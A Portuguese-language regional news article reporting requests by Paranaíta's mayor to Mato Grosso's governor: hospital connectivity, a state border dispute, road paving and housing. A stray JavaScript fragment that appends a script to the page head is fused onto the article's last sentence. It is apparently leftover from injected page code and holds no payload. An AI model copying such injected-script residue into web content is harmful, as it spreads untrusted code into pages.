Capa / Cidades / Prefeito de Paranaíta apresenta reivindicações em audiência com governador Taques

Prefeito de Paranaíta apresenta reivindicações em audiência com governador Taques

12821524_10204986854225588_6770113345236387777_nAltair Nery

O prefeito de Paranaíta, Tony Rufatto, apresentou uma série de reivindicações ao governador de Mato Grosso, Pedro Taques, durante audiência na tarde desta quarta-feira, 02, no Palácio Paiaguás, em Cuiabá. Entre os pleitos estão benefícios em saúde e infraestrutura.
Durante o encontro, o gestor paranaitense abordou a situação enfrentada pelo Hospital Regional Albert Sabin, em Alta Floresta, cujo funcionamento encontra dificuldade por não contar com serviços de telefonia e internet. O HR é o hospital de referência e atende pacientes de toda a região norte de Mato Grosso.
Outro assunto tratado diz respeito ao litígio entre Mato Grosso e Pará quanto à divisa entre os Estados. A indefinição tem trazido preocupação para várias cidades matogrossenses, incluindo Paranaíta, que não estão recolhendo tributos gerados na área de divisa. O governador matogrossense assegurou ao prefeito Tony Rufatto empenho para buscar uma solução para o impasse. “Ele nos disse que está em conversação com o governo do Pará e pediu que a Procuradoria Geral de Mato Grosso dê prioridade para que o acordo seja selado o mais breve possível”, informou.
Em relação à MT 206, o pedido é que a rodovia entre Paranaíta e Apiacás seja asfaltada. A pavimentação permitirá que a jazida de calcário possa ser explorada e o material utilizado para a agricultura dos municípios circunvizinhos. Além disso, a rodovia pavimentada reduz o custo do escoamento da produção regional. “Não tem como falar de agricultura na região se não tem condições de logística”, pontua.
Também estiveram na pauta com o governador, pedido de recursos para pavimentação asfáltica e construção de moradias em Paranaíta.
Agenda
No dia anterior á audiência com Pedro Taques, o prefeito Tony Rufatto visitou o Incra em companhia com representante dos acampados da São Pedro II, e a Caixa Econômica Federal, em busca de recursos. Na agenda cumprida na capital matogrossense estiveram visitas ao secretário de Educação de Mato Grosso, Permínio Fraga, e aos deputados Guilherme Maluf, presidente da Assembleia Legislativa, e Dilceu Dal Bosco. Aos parlamentares, o prefeito Tony Rufatto pediu apoio para conseguir uma quadra de esportes para o bairro Jardim Amazônia (Chácaras).d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top